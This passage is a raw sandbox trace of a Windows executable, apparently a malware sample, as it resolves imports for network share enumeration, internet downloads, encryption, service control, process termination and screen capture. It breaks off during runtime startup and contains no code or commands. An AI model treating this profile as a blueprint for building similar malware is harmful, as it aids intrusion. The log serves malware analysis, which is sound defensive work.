lpProcName="UuidToStringW") returned 0x76b31ee5 [0053.548] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0053.548] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0053.548] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0053.962] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0053.962] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0053.962] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0053.962] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0071.018] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0071.018] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0071.019] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0071.019] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0071.019] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0071.019] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0071.019] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0071.019] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0071.700] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0071.700] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0071.700] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0071.700] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0071.701] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0071.701] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0071.701] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0071.701] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0071.701] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0071.701] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0071.701] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0071.701] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0071.701] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0071.702] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0071.703] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0071.704] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0071.705] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0071.706] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0071.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0071.708] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0071.708] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0071.708] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0071.708] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0071.708] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0071.711] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0071.711] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0071.711] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0071.712] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0071.713] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0071.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0071.715] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0071.716] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0071.717] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0071.718] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0071.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0071.719] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0071.720] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0071.721] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0071.722] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0071.722] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0071.722] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0071.722] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0071.722] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0071.722] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0071.722] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0071.723] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0071.724] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0071.724] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0078.387] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0078.387] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0078.387] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0078.387] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0078.387] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0078.387] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0078.388] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0078.388] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0078.388] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0078.388] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0078.388] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0078.388] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0078.389] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0078.389] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0079.707] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0079.707] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0082.056] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0082.056] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0082.056] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0082.057] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0084.031] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0084.031] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0084.031] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0084.031] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0084.032] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0084.032] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0084.032] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0084.032] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0084.032] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0084.032] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0084.032] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0084.033] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0084.033] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0084.033] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0084.033] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0084.033] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0085.423] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 [0085.423] atexit (param_1=0x1e10920) returned 0 [0085.433] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ea8c | out: lpSystemTimeAsFileTime=0x18ea8c*(dwLowDateTime=0x7c14b200, dwHighDateTime=0x1d60e72)) [0085.433] GetCurrentThreadId () returned 0xae8 [0085.433] GetCurrentProcessId () returned 0xaec [0085.433] QueryPerformanceCounter (in: lpPerformanceCount=0x18ea84 | out: lpPerformanceCount=0x18ea84*=20550917957) returned 1 [0085.508] GetStartupInfoW (in: lpStartupInfo=0x18ea1c | out: lpStartupInfo=0x18ea1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0085.526] GetProcessHeap () returned 0x260000 [0085.671] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0085.672] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0085.673] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0085.674] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0085.675] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0085.676] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0085.676] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0085.676] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0085.676] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3bc) returned 0x27f4e0 [0085.677] GetCurrentThreadId () returned 0xae8 [0085.688] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x270968 [0085.688] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 